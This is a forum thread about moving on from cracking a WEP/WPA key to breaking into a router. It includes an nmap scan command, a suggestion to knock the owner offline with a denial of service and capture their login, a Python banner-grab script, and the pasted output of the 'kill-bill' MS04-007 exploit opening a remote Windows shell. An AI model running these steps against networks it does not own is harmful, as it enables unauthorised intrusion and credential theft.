Thread: whats next......

  1. #1
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    whats next......

    Sorry for the new thread guys, I almost feel like I'm spamming the forums, but I'm interested in what to do next after obtaining the WEP/WPA key. I know a lot of people just want to steal their neighbor's wireless or get free internet at a hotel, but I am really interested in pen testing and, being new to Linux, I could use some help. I'm doing plenty of research too, but I was hoping some tutorials were coming about what to do next. For example, how can I access an AP after I obtain the key? More importantly, how can I connect by exploiting a port? My router is firewalled and password protected, and for some reason it is inaccessible by wireless but it is by ethernet? Don't know why. I'm interested now in wirelessly accessing ports to gain control of a network. Just a nudge towards the right set of tools would help. I'm just trying to get the most out of BT because only using it for WEP cracking seems like using a Ferrari for a closet. Thanks

  2. #2
    Member
    Join Date
    Jan 2007
    Posts
    242


    I would hope most of the people here are interested in more than ripping off their neighbor's wireless. I hope this is your own router you are trying to exploit. Possibly if you rephrase your question...

    nmap -v -A <router ip>

    The above command will show you what common ports are open on your router and possibly what kind of router it is.

    You could google for the type of router plus exploit.

    You could possibly create a denial of service and steal the login credentials with a **** attack when the owner logs in to see what's going on.

    Stealing your neighbor's bandwidth can have unexpected results. An email "from you" to everyone in your address book concerning your new sexual orientation comes to mind.

    Have Fun

  3. #3
    Developer
    Join Date
    Mar 2007
    Posts
    6,124


    Of course it's my own router and I know how to use nmap. My router is only open on 80 and 443, both HTTP ports as far as I can figure. The problem is I can't access the login screen wirelessly, but I can from one of the hardwired PCs on my network. I guess I'm looking for the workaround for that, i.e. connecting to a router port wirelessly {through a firewall} in order to access the network. I realize this is a tall order, but some help in the right direction would help.......... Such as, I'm now reading up and studying Metasploit, but some of the types of exploits are way over my head. Maybe if you guys know another forum or site I have not yet visited. Thanks,

  4. #4
    Moderator theprez98
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533


    Quote Originally Posted by purehate View Post
    Of course it's my own router and I know how to use nmap. My router is only open on 80 and 443, both HTTP ports as far as I can figure. The problem is I can't access the login screen wirelessly, but I can from one of the hardwired PCs on my network. I guess I'm looking for the workaround for that, i.e. connecting to a router port wirelessly {through a firewall} in order to access the network. I realize this is a tall order, but some help in the right direction would help.......... Such as, I'm now reading up and studying Metasploit, but some of the types of exploits are way over my head. Maybe if you guys know another forum or site I have not yet visited. Thanks,
    One vector of attack would be if someone connected to port 80, they could do a banner grab and find out what version of IIS/Apache you're running, and if it has any associated exploits.
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";
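    The banner grab that post #2 (nmap -v -A) and post #4 describe against the router's port 80, written out as a single HTTP request so you can see exactly what the device volunteers about itself. This is an added example, not code from the thread or from any of the posters. To keep it runnable offline it starts a local http.server that impersonates a router admin page; the Server header value lighttpd/1.4.13 and the 401 Basic-auth response are constructed stand-ins, not taken from any real device. Point grab_banner() at a host and port on a network you own to use it for real.

    ```python
"""Banner grab against an HTTP service and pull out the Server header.

Added example for this thread; not the poster's code. The fake router
below is a constructed target so the script runs with no network access.
"""
import http.server
import socket
import threading


def grab_banner(host: str, port: int, timeout: float = 5.0) -> dict:
    """Send one HTTP/1.0 HEAD request and return status line plus headers.

    One request, no probing: what comes back is only what the target
    chooses to say. A Server header can be stripped or spoofed, so treat
    it as a hint about software/version, not proof of it.
    """
    request = (f"HEAD / HTTP/1.0\r\nHost: {host}\r\n"
               "User-Agent: banner-grab\r\nConnection: close\r\n\r\n")
    raw = b""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request.encode("ascii"))
        # Read until the blank line that ends the header block.
        while b"\r\n\r\n" not in raw:
            chunk = sock.recv(4096)
            if not chunk:
                break
            raw += chunk
            if len(raw) > 65536:  # cap so a hostile server can't blow up memory
                break
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1", "replace")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"status_line": lines[0] if lines else "",
            "headers": headers,
            "server": headers.get("server", "")}


class _FakeRouterHandler(http.server.BaseHTTPRequestHandler):
    """Constructed stand-in for a router admin page (hypothetical banner)."""
    server_version = "lighttpd/1.4.13"   # assumed value, not a real device
    sys_version = ""                      # hide the Python version string

    def do_HEAD(self):
        # Typical router behaviour: the admin UI sits behind Basic auth.
        self.send_response(401)
        self.send_header("WWW-Authenticate", 'Basic realm="Router"')
        self.send_header("Content-Type", "text/html")
        self.end_headers()

    def log_message(self, *args):
        pass  # keep the demo output clean


def start_fake_router() -> http.server.HTTPServer:
    """Bind the fake target on a free loopback port and serve in the background."""
    srv = http.server.HTTPServer(("127.0.0.1", 0), _FakeRouterHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def demo() -> dict:
    """Run the grab against the fake router and return what it reported."""
    srv = start_fake_router()
    try:
        return grab_banner("127.0.0.1", srv.server_address[1])
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    info = demo()
    print(info["status_line"])
    for name, value in info["headers"].items():
        print(f"{name}: {value}")
    print("server banner:", info["server"] or "(none)")
    ```

    Against a real device the interesting fields are the Server header, the WWW-Authenticate realm (which often names the model even when the Server header is generic), and whether the thing answers at all from the wireless side; a 401 tells you the admin interface is reachable but gated, while a connection refused or timeout from the WLAN but not from the wired LAN points to the router only binding its admin UI to the wired interface, which is the symptom post #3 describes.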

  5. #5
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    kill-bill

    $ ./kill-bill.pl
    . kill-bill : Microsoft ASN.1 remote exploit for CAN-2003-0818 (MS04-007)
    by Solar Eclipse <solareclipse@phreedom.org>

    Usage: kill-bill -p <port> -s <service> host

    Services:
    iis IIS HTTP server (port 80)
    iis-ssl IIS HTTP server with SSL (port 443)
    exchange Microsoft Exchange SMTP server (port 25)
    smb-nbt SMB over NetBIOS (port 139)
    smb SMB (port 445)

    If a service is running on its default port you don't have to
    specify both the service and the port.

    Examples: kill-bill -s iis 192.168.0.1
    kill-bill -p 80 192.168.0.1
    kill-bill -p 1234 -s smb 192.168.0.1

    $ ./kill-bill.pl -s smb 192.168.0.1
    . kill-bill : Microsoft ASN.1 remote exploit for CAN-2003-0818 (MS04-007)
    by Solar Eclipse <solareclipse@phreedom.org>

    . Loading shellcode
    . Generating SPNEGO token
    SPNEGO token is 4222 bytes long.
    . Exploiting SMB server at 192.168.0.1:445
    Sending Negotiate Protocol Request
    Sending Session Setup AndX request (4287) bytes
    . Attempting to connect to shell on port 8721

    Microsoft Windows 2000 [Version 5.00.2195]
    (C) Copyright 1985-2000 Microsoft Corp.

    C:\WINNT\system32>


    This comes with some exploit instructions. Anyone know it?
